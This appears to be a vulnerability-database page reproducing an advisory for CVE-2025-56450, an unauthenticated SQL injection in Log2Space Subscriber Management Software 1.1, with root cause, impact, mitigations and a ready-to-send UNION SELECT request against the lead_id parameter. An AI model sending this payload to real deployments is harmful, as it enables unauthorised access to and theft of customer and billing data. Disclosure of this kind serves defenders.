Lucene search
K

📄 Log2Space Subscriber Management Software 1.1 SQL Injection

🗓️ 22 Oct 2025 00:00:00Reported by Rohan Patil, Aditya PatilType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 145 Views

Unauthenticated SQL Injection in Log2Space Software 1.1 at /l2s/api/selfcareLeadHistory.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-56450
16 Oct 202521:00
circl
CNNVD
Spacecom Log2Space Subscriber Management Software 安全漏洞
21 Oct 202500:00
cnnvd
CVE
CVE-2025-56450
21 Oct 202500:00
cve
Cvelist
CVE-2025-56450
21 Oct 202500:00
cvelist
EUVD
EUVD-2025-35180
21 Oct 202500:00
euvd
NVD
CVE-2025-56450
21 Oct 202515:15
nvd
RedhatCVE
CVE-2025-56450
22 Oct 202517:18
redhatcve
Vulnrichment
CVE-2025-56450
21 Oct 202500:00
vulnrichment
Author: 
    Aditya Patil ([email protected])
    Rohan Patil 
    ([email protected])
    
    # CVE-2025-56450
    Unauthenticated SQL Injection in Log2Space Subscriber Management Software (Version 1.1)
    
    **Overview:**
    
    An unauthenticated SQL Injection vulnerability has been identified in the Log2Space Subscriber Management Software, specifically within the /l2s/api/selfcareLeadHistory API endpoint.
    The flaw allows remote attackers to execute arbitrary SQL queries against the backend database without authentication
    
    **Technical Details:**
    
    POST /l2s/api/selfcareLeadHistory
    Content-Type: multipart/form-data
    Content-Disposition: form-data; name="lead_id"
    
    **Vulnerable Parameter: lead_id**
    
    **Example Exploit Payload**
    
    POST /l2s/api/selfcareLeadHistory HTTP/1.1
    Host: target.com
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
    Content-Length: xxx
    
    ------WebKitFormBoundary
    Content-Disposition: form-data; name="lead_id"
    
    1' UNION SELECT database(),version(),user()--
    ------WebKitFormBoundary--
    
    
    
    <img width="960" height="364" alt="1 1" src="https://github.com/user-attachments/assets/bef52e64-4a7b-4412-83fb-664543e09f0a" />
    
    <img width="960" height="432" alt="2" src="https://github.com/user-attachments/assets/d451ee3f-a1e2-42a5-957b-132f8a6a6ade" />
    
    
    **Root Cause**
    
    The lead_id parameter is directly concatenated into SQL queries without proper input validation or parameterized statements.
    This results in full SQL injection vulnerability, allowing attackers to:
    
    1. Enumerate database schemas and table names
    2. Extract sensitive customer or billing data
    3. Execute stacked queries
    4. Potentially achieve remote code execution depending on DB configuration
    
    **Impact**
    
    1. Attackers can extract sensitive customer data from the database.
    2. Under certain configurations, SQL injection can lead to remote code execution.
    3. Attackers can manipulate or delete customer and billing data.
    
    **Mitigation**
    
    1. Implement parameterized queries (prepared statements) for all database operations.
    2. Enforce strict input validation and sanitization on all user-supplied data.
    3. Disable verbose SQL error messages in production environments.
    4. Disable verbose SQL error messages in production environments.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Oct 2025 00:00Current
8.3High risk
Vulners AI Score8.3
CVSS 3.16.5
EPSS0.00176
SSVC
145